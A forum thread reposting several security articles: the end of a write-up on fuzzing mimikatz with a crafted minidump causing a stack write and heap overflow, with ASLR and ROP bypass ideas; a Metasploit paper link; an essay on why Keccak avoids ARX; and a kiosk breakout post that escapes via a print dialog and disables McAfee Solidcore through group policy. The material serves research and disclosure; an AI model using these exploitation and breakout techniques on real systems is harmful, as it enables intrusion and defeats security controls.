bytes store the NumberOfMemoryRanges (this controls the number of loops and therefore how often we can write). Since we just want to demonstrate the vulnerability we set it to one to make exactly one write operation (overwrite the return address). The next 8 bytes are the BaseRVA. This value controls “ptr” in line 6 which is the source from where we copy stuff. So we have to store there the relative offset in our dump file where we store the new return address (which should overwrite the original one). I’am using the value 0x90 here but we can use any value. It’s only important that we store the new return address at that offset (in my case offset 0x90) then. I therefore wrote 0x41414141 to offset 0x90. The next 8 bytes control the “StartOfMemoryRange” variable. I originally used 0xffffffffffffffff (like in the above example), however, for demonstration purpose I wanted to overwrite 4 bytes of the return address (and not only 1) and therefore had to subtract 4 (the DataSize, check the second condition in line 12). The next 8 bytes control the “DataSize” and as already explained I set this to 4 to write 4 bytes. Here is the file: Hint: In the above figure the malicious bytes start at offset 0xF0. This offset can differ in your minidump file. If we check the byte at 0x0C (= 0x20) we can see that this is the offset to the “streams” directory. Therefore, the above minidump has a streams directory starting at offset 0x20. Every entry there consists of 3 DWORDS (on x86), the first is the type and the last is the offset. We search for the entry with type 0x09 (=Memory64ListStream). This can be found in our figure at offset 0x50. If we take the 3rd DWORD from there we can see that this is exactly 0xF0 – the offset where our malicious bytes start. If this offset is different in your minidump file you may want to patch it first. And here is the proof that we really have control over the return address: Please note that full exploitation is still tricky because we have to find a way around ASLR. Because of DEP our data is marked as not executable, therefore we can’t jump into shellcode. The default bypass technique is to apply ROP which means that we instead invoke already existing code. However, because of ASLR this code is always loaded at randomized addresses. And here is what we can do with the above vulnerability is: We can make a relative write on the stack which means we can overwrite the return address (or arguments or local variables like loop counters or destination pointers). Because of the relative write we can bypass stack ASLR. Next we can choose the size of the write operation which means we can make a partial overwrite. We can therefore overwrite only the two lower bytes of the return address which means we can bypass module level ASLR (These two conditions make the vulnerability so useful). We can check the ranges which we can reach by checking the call-stack to the vulnerable code (every return address on this stack trace can be targeted via a partial overwrite) and we have multiple paths to come to the vulnerable code (and therefore different call-stacks with different ranges; We can even create more different call-stacks by overwriting a return address with an address which creates another call-stack to the vulnerable code). For example, a simple exploit could be to overwrite one of the return addresses with the address of code which calls LoadLibraryA() (e.g. 0x455DF3 which is in range) or LoadLibraryW (e.g. 0x442145). The address must be chosen in a way that the function argument is a pointer to the stack because then we can use the vulnerability to write the target path (UNC Path to a malicious library) to this address on the stack. Next, this exploit could be extended to first call kull_m_file_writeData() to write a library to the file system which gets later loaded via LoadLibrary (this way UNC paths are not required for exploitation). Another idea would be to make a specific write which exchanges the destination and source arguments from the vulnerable code. Then the first write operations can be used to write the upper bytes of return addresses (which are randomized by ASLR) to the memory dump buffer. After that these bytes can be written back to the stack (with the vulnerability) and full ROP chains can be built because we can now write ROP gadget addresses after each other. Without this idea we cannot execute multiple ROP gadgets after each other because they are not stored adjacent on the stack (return addresses are not stored next to each other on stack because there is other memory stored there like arguments, local variables and so on). However, I believe that this exploitation scenario is much more difficult because it requires multiple writes (which must be sorted to surive all checks in the mimikatz code), so the first approach with LoadLibrary should be more simple to implement. Vulnerability 2: Heap overflow The major cause of the second vulnerability can be found inside kull_m_process_getUnicodeString(). The first parameter (string) is a structure with the fields buffer (data pointer), a maximum length of bytes the string can hold and the length (currently stored characters). The content is completely under attacker control because it is parsed from the minidump. Moreover, the source (the second argument) also points to the minidump (attacker controlled). Mimikatz always extracts the string structure from the minidump and calls after that kull_m_process_getUnicodeString() to fill string->buffer with the real string from the minidump. Can you spot the problem? Line 9 allocates space for string->MaximumLength bytes and after that it copies exactly the same number of bytes from the minidump to the heap (line 11). However, the code never checks string->Length and therefore string->Length can be bigger than string->MaximumLength because this value is retrieved from the minidump. If later code uses string->Length a heap overflow can occur. This is for example the case when MSV1.0 (dpapi) credentials are stored in the minidump. Then mimikatz uses the string as input (and output) inside the decryption function in kuhl_m_sekurlsa_nt6_LsaEncryptMemory() and the manipulated length value leads to a heap overflow (however, the MSV1.0 execution path is not trivial/possible to exploit in my opinion, but there are many other paths which use kull_m_process_getUnicodeString()). Vulnerabilities patch status At time of publication (2017-09-22) there is no fix available for mimikatz. I informed the author on 2017-08-26 about the problems and received on 2017-08-28 a very friendly answer, that he will fix the flaws if it does not expand the code base too much. He also pointed out that mimikatz was developed as a proof-of-concept and it could be more secure by using a higher level language on which I totally agree on. On 2017-08-28 I sent the SMIME encrypted vulnerability details (together with this blog post). Since I didn’t receive answers on further emails or twitter messages, I informed him on 2017-09-06 about the blog post release on 2017-09-21. If you are a security consultant and using mimikatz in minidump mode, make sure to only use it inside a special mimikatz-virtual machine which is not connected to the internet/intranet and does not store important information (I hope you are already doing this anyway). To further mitigate the risk (e.g. a VM escape) I recommend to fix the above mentioned vulnerabilities. THEORY: RECOMMENDED FUZZING WORKFLOW In this last chapter, I want to quickly summarize the fuzzing workflow which I recommend: Download as many input files as possible. Calculate a minset of input files which still trigger the full code/edge coverage (corpus distillation). Use a Bloom-Filter for fast detection of different coverage. Minimize the file size of all input files in the minset. For the generated minset, calculate the code coverage (no Bloom-Filter). Now we can statically add breakpoints (byte 0xCC) at all basic blocks which were not hit yet. This modified application can be started with all files from the input and should not crash. However, we can continue downloading more files from the internet and start the modified binary (or just fuzz it). As soon as the application crashes (and our Just-in-Time configured compiler script kicks in) we know that a new code path was taken. Using this approach, we can achieve native execution speed but extract the information about new coverage! (downside: Checksums from files break; Moreover, a fork-server should also be used.) During fuzzing I recommend extraction of edge coverage (which requires instrumentation) and therefore we should fuzz with instrumentation (and sanitizers / heap libraries). For every input, we conduct an analysis phase before fuzzing. This analysis phase does the following: First identify the common code which gets executed for most inputs (for this we had to log the code coverage without the bloom-filter). Then get the code coverage for the current input and subtract the common code coverage from it. What we get is the code coverage which makes this fuzzing input “important” (code which only gets executed for this input). Next, we start our heatmap analysis but we just log the read operations conducted by this “important code”! What we get from this are the bytes which make our input “important”. Now we don’t have to fuzz the full input file, nor we have to fuzz the bytes which are read by the application, instead we only have to fuzz the few bytes which make the file “special”! I recommend focusing on these “special” bytes but also fuzz the other bytes afterwards (Fuzzing the special bytes fuzzes the new code, fuzzing all bytes fuzzes the old code with the new state resulting from the new code). Moreover, we can add additional slow checks which must be done only once for a new input (e.g. log all heap allocations and check for dangling-pointers after a free-operation; similar concept to Edge’s MemGC). Of course, some additional feedback and symbolic execution. Want to learn more about fuzzing? Come to one of my fuzzing talks (heise devSec or IT-SeCX for fuzzing applications with source code available and DefCamp for fuzzing closed-source applications!) or just follow me on Twitter. Sursa: https://www.sec-consult.com/en/blog/2017/09/hack-the-hacker-fuzzing-mimikatz-on-windows-with-winafl-heatmaps-0day/index.html
-
- 2
-
-
Metasploit Low Level View Saad Talaat (saadtalaat@gmail.com) @Sa3dtalaat Abstract: for the past decade (almost) Metasploit have been number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key-point of this paper is to discuss metasploit framework as a code injector and payload encoder. Another key-point of this paper is malware different forms and how to avoid anti-viruses which have been a pain for pentesters lately. And how exactly anti-malware software work. Download: https://www.exploit-db.com/docs/18532.pdf
-
- 1
-
-
Why Keccak is not ARX If SHA-2 is not broken, why would one switch to SHA-3 and not just stay with SHA-2? There are several arguments why Keccak/SHA-3 is a better choice than SHA-2. In this post, we come back on a particular design choice of Keccak and explain why Keccak is not ARX, unlike SHA-2. We specified Keccak at the bit-level using only transpositions, bit-level additions and multiplications (in GF(2)). We arranged these operations to allow efficient software implementations using fixed sequences of bitwise Boolean instructions and (cyclic) shifts. In contrast, many designers specify their primitives directly in pseudocode similarly including bitwise Boolean instructions and (cyclic) shifts, but on top of that also additions. These additions are modulo 2n with n a popular CPU word length such as 8, 32 or 64. Such primitives are dubbed ARX that stands for “addition, rotation and exclusive-or (XOR)”. The ARX approach is widespread and adopted by popular designs MD4, MD5, SHA-1, SHA-2, Salsa, ChaCha, Blake(2) and Skein. So why isn't Keccak following the ARX road? We give some arguments in the following paragraphs. ARX is fast! It is! Is it? One of the main selling points of ARX is its efficiency in software: Addition, rotation and XOR usually only take a single CPU cycle. For addition, this is not trivial because the carry bits may need to propagate from the least to the most significant bit of a word. Processor vendors have gone through huge efforts to make additions fast, and ARX primitives take advantage of this in a smart way. When trying to speed up ARX primitives by using dedicated hardware, not so much can be gained, unlike in bit-oriented primitives as Keccak. Furthermore, the designer of an adder must choose between complexity (area, consumption) or gate delay (latency): It is either compact or fast, but not at the same time. A bitwise Boolean XOR (or AND, OR, NOT) does not have this trade-off: It simply take a single XOR per bit and has a gate delay of a single binary XOR (or AND, OR, NOT) circuit. So the inherent computational cost of additions is a factor 3 to 5 higher than that of bitwise Boolean operations. But even software ARX gets into trouble when protection against power or electromagnetic analysis is a threat. Effective protection at primitive level requires masking, namely, where each sensitive variable is represented as the sum of two (or more) shares and where the operations are performed on the shares separately. For bitwise Boolean operations and (cyclic) shifts, this sum must be understood bitwise (XOR), and for addition the sum must be modulo 2n. The trouble is that ARX primitives require many computationally intensive conversions between the two types of masking. ARX is secure! It is! Is it? The cryptographic strength of ARX comes from the fact that addition is not associative with rotation or XOR. However, it is very hard to estimate the security of such primitives. We give some examples to illustrate this. For MD5, it took almost 15 years to be broken while the collision attacks that have finally been found can be mounted almost by hand. For SHA-1, it took 10 years to convert the theoretical attacks of around 2006 into a real collision. More recently, at the FSE 2017 conference in Tokyo, some attacks on Salsa and ChaCha were presented, which in retrospect look trivial but that remained undiscovered for many years. Nowadays, when a new cryptographic primitive is published, one expects arguments on why it would provide resistance against differential and linear cryptanalysis. Evaluating this resistance implies investigating propagation of difference patterns and linear masks through the round function. In ARX designs, the mere description of such difference propagation is complicated, and the study of linear mask propagation has only barely started, more than 25 years after the publication of MD5. A probable reason for this is that (crypt)analyzing ARX, despite its merits, is relatively unrewarding in terms of scientific publications: It does not lend itself to a clean mathematical description and usually amounts to hard and ad-hoc programming work. A substantial part of the cryptographic community is therefore reluctant to spend their time trying to cryptanalyze ARX designs. We feel that the cryptanalysis of more structured designs such as Rijndael/AES or Keccak/SHA-3 leads to publications that provide more insight. ARX is serious! It is! Is it? But if ARX is really so bad, why are there so many primitives from prominent cryptographers using it? Actually, the most recent hash function in Ronald L. Rivest's MD series, the SHA-3 candidate MD6, made use of only bitwise Boolean instructions and shifts. More recently, a large team including Salsa and ChaCha designer Daniel J. Bernstein published the non-ARX permutation Gimli. Gimli in turn refers to NORX for its design approach, a CAESAR candidate proposed by a team including Jean-Philippe Aumasson and whose name stems from a rather explicit “NO(T A)RX”. Actually, they are moving in the direction where Keccak and its predecessors (e.g., RadioGatún, Noekeon, BaseKing) always were. So, maybe better skip ARX? Sursa: https://keccak.team/2017/not_arx.html
-
Breaking out of Restricted Windows Environment ON JUNE 14, 2017 BY WEIRDGIRL Many organizations these days use restricted windows environment to reduce the surface of vulnerability. The more the system is hardened the less the functionalities are exposed. I recently ran across such a scenario, where an already hardened system was protected by McAfee Solidcore. Solidcore was preventing users from making any changes to the system like installing/un-installing softwares, running executables, launching applications etc. The system (Windows 7) which I was testing, boots right on to the application login screen while restricting access to other OS functionalities. I could not do anything with that system except for restarting it. I spent a whole week in gathering information about the application and the system, which includes social engineering as well And then I got an entry point to start with. The credentials to login to the application(that gave me headache for one week) was available on Internet (thanks to Google dork). The credential I got was admin credential. After logging in to the application there was no way to get out of the application and get in to the base system. The application was so well designed that there was not a single way to get out of it. Then I found an option in the application to print some document. Then clicked on print-->printer settings-->add a printer-->location-->browse location and I got access to file browser of host machine. Every windows file explorer has a windows help option which provides free help about windows features. It was possible to open command prompt from the help option. I was only able to open command prompt but not any other windows application. Even after getting access to command prompt I was unable to do any changes in the system(not even opening a notepad). Every windows application that I tried to open, ended up with the following error message: The error was very clear that the application is blocked and it can either be enabled from registry editor or group policy editor. However I did not have access to both of them. Solidcore was blocking access to any of those. So I used the following batch script to enable task manager. The script was used to modify the registry key(though I didn’t have any idea if it was actually blocked from registry editor or group policy editor): And to my surprise I was able to unlock task manager. Similarly I was able to unlock and open control panel. My main objective was to disable or uninstall Solidcore as it was restricting the desktop environment. But then the system kept on giving me challenges. I was able to uninstall any software except for Solidcore. Then there was only one way left to disable Solidcore / enable installation of other software and that was “Group Policy Editor“. However I didn’t have direct access to gpedit. I used the following way to get access to gpedit: Open Task manager-->File -->New task-->Type MMC and enter This opened Microsoft Management Policy In mmc File-->Add/Remove snap-in--> Select Group Policy Objects and click on add After this I was able to perform numerous actions like enabling blocked system applications, allowing access to Desktop, disabling windows restrictions etc. However my main objective was to disable Solidcore and find out a way to run any windows executable. Group Policy editor provides an option to run/block only allowed windows software. And this policy can be set in the following way: Group Policy editor-->User Configuration > Administrative Templates > System On the right side there's option "Do not run specified windows applications". Click on that: Edit-->Select Enabled-->Click on show list of disallowed applications--> then add the application name that you want to block(in my case it was solidcore). Then click "Ok" . To apply changes I restarted my system. In the same way it was possible to enable list of allowed applications that can run in windows(a malicious software as well). And that’s how I was able to break out of a completely restricted desktop environment Sursa: https://weirdgirlweb.wordpress.com/2017/06/14/first-blog-post/
-
- 2
-
-